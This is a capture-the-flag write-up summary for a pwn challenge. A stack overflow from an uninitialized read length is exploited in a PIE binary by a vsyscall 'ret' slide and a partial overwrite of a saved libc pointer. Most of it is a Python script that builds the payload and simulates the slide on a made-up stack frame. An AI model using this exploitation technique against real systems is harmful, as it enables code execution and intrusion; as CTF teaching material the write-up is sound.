Tags: aslr vsyscall pie 

Rating:

An uninitialized value is used as the length argument of a `read()` from the user, so the call becomes a stack buffer overflow.
The binary is PIE and ASLR is enabled -- and we have no leaks!

We deal with it using a `vsyscall` gadget: the vsyscall page is mapped at a fixed address (`0xffffffffff600000`) regardless of ASLR, and in the kernel's emulated mode its entry behaves like a plain `ret`, so overwriting the return address with copies of it lets us "slide" down the stack until we reach a saved libc address that we can partially overwrite.
From there, we overwrite only the low bytes of that libc address to make it jump to a **PATCHED-IN** gadget (the given libc had an additional gadget), and finally get a shell!
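The payload shape described above, as an added example that is not the challenge binary or the exploit from the linked writeup. It builds the filler, the run of vsyscall "ret" slots and the partial overwrite, and replays `ret` semantics over a constructed stack image to check where execution lands. Every offset, address and the fake stack frame are made-up values; `partial_overwrite_bytes`, `build_payload` and `simulate_ret_slide` are names chosen here.

```python
"""
Added example: vsyscall ret-slide plus partial overwrite of a saved libc
pointer. All offsets, addresses and the stack frame below are constructed;
they are not the values from the challenge or the linked writeup.
"""
import struct

# The vsyscall page is mapped at the same address in every process, ASLR or
# not. In the kernel's emulate mode the gettimeofday entry runs the syscall in
# the kernel and returns to the next stack slot, so it acts like a `ret`.
VSYSCALL_GETTIMEOFDAY = 0xFFFFFFFFFF600000
QWORD = 8
LIBC_PAGE_BITS = 12  # libc is page aligned: the low 12 bits of any libc address do not depend on ASLR


def expected_attempts(n_bytes):
    """Brute-force cost of an n-byte partial overwrite of a libc pointer:
    every overwritten bit above the page offset is randomised by ASLR."""
    return 1 << (n_bytes * 8 - LIBC_PAGE_BITS)


def partial_overwrite_reaches(saved_ptr, target, n_bytes):
    """A partial overwrite keeps the untouched high bytes, so the target must
    share them with the pointer that is already on the stack."""
    return (saved_ptr >> (n_bytes * 8)) == (target >> (n_bytes * 8))


def partial_overwrite_bytes(target_libc_offset, n_bytes, guess):
    """Low n_bytes of libc_base + target_libc_offset. The ASLR bits of the
    base that fall inside the overwritten range (bits 12 .. n_bytes*8-1)
    are unknown without a leak and are supplied as a guess."""
    unknown_bits = n_bytes * 8 - LIBC_PAGE_BITS
    if not 0 <= guess < (1 << unknown_bits):
        raise ValueError("guess must fit in %d bits" % unknown_bits)
    mask = (1 << (n_bytes * 8)) - 1
    value = (target_libc_offset + (guess << LIBC_PAGE_BITS)) & mask
    return value.to_bytes(n_bytes, "little")


def build_payload(buf_to_ret, slide_slots, low_bytes):
    """Filler up to the saved return address, then slide_slots copies of the
    vsyscall 'ret', then only the low bytes of the target so the rest of the
    saved libc pointer is left as it was."""
    return (b"A" * buf_to_ret
            + struct.pack("<Q", VSYSCALL_GETTIMEOFDAY) * slide_slots
            + low_bytes)


def simulate_ret_slide(stack, buf_to_ret, payload):
    """Write the payload into a constructed stack image (bytes starting at
    the overflowed buffer) and follow `ret` semantics from the saved return
    address. Returns the first popped address that is not the vsyscall
    gadget, i.e. where execution really ends up."""
    image = bytearray(stack)
    image[:len(payload)] = payload
    sp = buf_to_ret
    while True:
        rip = struct.unpack_from("<Q", image, sp)[0]
        sp += QWORD
        if rip != VSYSCALL_GETTIMEOFDAY:
            return rip


def demo():
    """Constructed frame: 0x28 bytes of buffer/locals, the saved return
    address into the PIE binary, two junk slots, then a saved libc pointer.
    Returns True when the slide and the 2-byte overwrite land on the target."""
    libc_base = 0x7F3A1C800000
    saved_libc_off = 0x21B97   # hypothetical offset of the saved libc pointer
    target_off = 0x2A1A0       # hypothetical offset of the patched-in gadget
    buf_to_ret = 0x28
    stack = (b"\x00" * buf_to_ret
             + struct.pack("<Q", 0x5581DEADB700)             # saved ret into PIE code
             + struct.pack("<Q", 0) * 2                       # junk slots
             + struct.pack("<Q", libc_base + saved_libc_off)  # saved libc pointer
             + struct.pack("<Q", 0) * 4)
    n_bytes = 2
    guess = (libc_base >> LIBC_PAGE_BITS) & 0xF  # the nibble a real exploit has to brute-force
    low = partial_overwrite_bytes(target_off, n_bytes, guess)
    payload = build_payload(buf_to_ret, slide_slots=3, low_bytes=low)
    return simulate_ret_slide(stack, buf_to_ret, payload) == libc_base + target_off


if __name__ == "__main__":
    print("landed on the gadget:", demo())
```

Two practical checks before relying on this: the kernel must still map the vsyscall page (`vsyscall=emulate` or `xonly`, not `none`), and the registers the emulated `gettimeofday` receives in `rdi`/`rsi` must be NULL or user-space addresses, which holds right after the overflowing `read()`. A two-byte overwrite only reaches targets that share the saved pointer's upper bytes and costs about 16 tries on the 4 randomised bits; a three-byte one reaches more but costs about 4096.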

Original writeup (https://github.com/perfectblue/ctf-writeups/blob/master/whitehat-grandprix-2018/pwn03_onehit.md).